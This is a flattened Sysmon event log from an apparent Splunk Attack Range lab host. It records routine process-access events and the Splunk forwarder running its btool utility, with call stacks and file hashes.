13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE4-6005-BF00-00000000A301}46682660C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.262{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE4-6005-BE00-00000000A301}13124660C:\Windows\system32\cmd.exe{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.256{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 